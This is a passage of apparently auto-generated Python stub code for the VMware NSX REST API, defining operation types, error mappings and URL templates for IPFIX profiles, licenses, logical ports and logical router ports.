create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ipfix-profiles',
request_body_parameter='ipfix_upm_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ipfix_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
path_variables={
'ipfix_profile_id': 'ipfix-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ipfix_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
path_variables={
'ipfix_profile_id': 'ipfix-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'applied_to_entity_id': type.OptionalType(type.StringType()),
'applied_to_entity_type': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'profile_types': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ipfix-profiles',
path_variables={
},
query_parameters={
'applied_to_entity_id': 'applied_to_entity_id',
'applied_to_entity_type': 'applied_to_entity_type',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'profile_types': 'profile_types',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ipfix_profile_id': type.StringType(),
'ipfix_upm_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ipfix-profiles/{ipfix-profile-id}',
request_body_parameter='ipfix_upm_profile',
path_variables={
'ipfix_profile_id': 'ipfix-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'IpfixUpmProfile')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ipfix_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _LicensesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/licenses',
request_body_parameter='license',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'license_key': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/licenses/{license-key}',
path_variables={
'license_key': 'license-key',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete_0 operation
delete_0_input_type = type.StructType('operation-input', {
'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
})
delete_0_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_0_input_value_validator_list = [
]
delete_0_output_validator_list = [
]
delete_0_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/licenses?action=delete',
request_body_parameter='license',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/license',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for getlicensebykey operation
getlicensebykey_input_type = type.StructType('operation-input', {
'license_key': type.StringType(),
})
getlicensebykey_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
getlicensebykey_input_value_validator_list = [
]
getlicensebykey_output_validator_list = [
]
getlicensebykey_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/licenses/{license-key}',
path_variables={
'license_key': 'license-key',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/licenses',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'license': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/license',
request_body_parameter='license',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'delete_0': {
'input_type': delete_0_input_type,
'output_type': type.VoidType(),
'errors': delete_0_error_dict,
'input_value_validator_list': delete_0_input_value_validator_list,
'output_validator_list': delete_0_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'getlicensebykey': {
'input_type': getlicensebykey_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
'errors': getlicensebykey_error_dict,
'input_value_validator_list': getlicensebykey_input_value_validator_list,
'output_validator_list': getlicensebykey_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LicensesListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'License'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'delete_0': delete_0_rest_metadata,
'get': get_rest_metadata,
'getlicensebykey': getlicensebykey_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.licenses',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _LogicalPortsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'logical_port': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-ports',
request_body_parameter='logical_port',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'lport_id': type.StringType(),
'detach': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/logical-ports/{lport-id}',
path_variables={
'lport_id': 'lport-id',
},
query_parameters={
'detach': 'detach',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'lport_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-ports/{lport-id}',
path_variables={
'lport_id': 'lport-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'attachment_id': type.OptionalType(type.StringType()),
'attachment_type': type.OptionalType(type.StringType()),
'bridge_cluster_id': type.OptionalType(type.StringType()),
'container_ports_only': type.OptionalType(type.BooleanType()),
'cursor': type.OptionalType(type.StringType()),
'diagnostic': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'logical_switch_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'parent_vif_id': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'switching_profile_id': type.OptionalType(type.StringType()),
'transport_node_id': type.OptionalType(type.StringType()),
'transport_zone_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-ports',
path_variables={
},
query_parameters={
'attachment_id': 'attachment_id',
'attachment_type': 'attachment_type',
'bridge_cluster_id': 'bridge_cluster_id',
'container_ports_only': 'container_ports_only',
'cursor': 'cursor',
'diagnostic': 'diagnostic',
'included_fields': 'included_fields',
'logical_switch_id': 'logical_switch_id',
'page_size': 'page_size',
'parent_vif_id': 'parent_vif_id',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'switching_profile_id': 'switching_profile_id',
'transport_node_id': 'transport_node_id',
'transport_zone_id': 'transport_zone_id',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'lport_id': type.StringType(),
'logical_port': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/logical-ports/{lport-id}',
request_body_parameter='logical_port',
path_variables={
'lport_id': 'lport-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPortListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalPort'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.logical_ports',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _LogicalRouterPortsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'logical_router_port': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPort')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-router-ports',
request_body_parameter='logical_router_port',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'logical_router_port_id': type.StringType(),
'cascade_delete_linked_ports': type.OptionalType(type.BooleanType()),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
path_variables={
'logical_router_port_id': 'logical-router-port-id',
},
query_parameters={
'cascade_delete_linked_ports': 'cascade_delete_linked_ports',
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'logical_router_port_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
path_variables={
'logical_router_port_id': 'logical-router-port-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'logical_router_id': type.OptionalType(type.StringType()),
'logical_switch_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'resource_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-router-ports',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'logical_router_id': 'logical_router_id',
'logical_switch_id': 'logical_switch_id',
'page_size': 'page_size',
'resource_type': 'resource_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'logical_router_port_id': type.StringType(),
'logical_router_port': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPort')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
request_body_parameter='logical_router_port',
path_variables={
'logical_router_port_id': 'logical-router-port-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
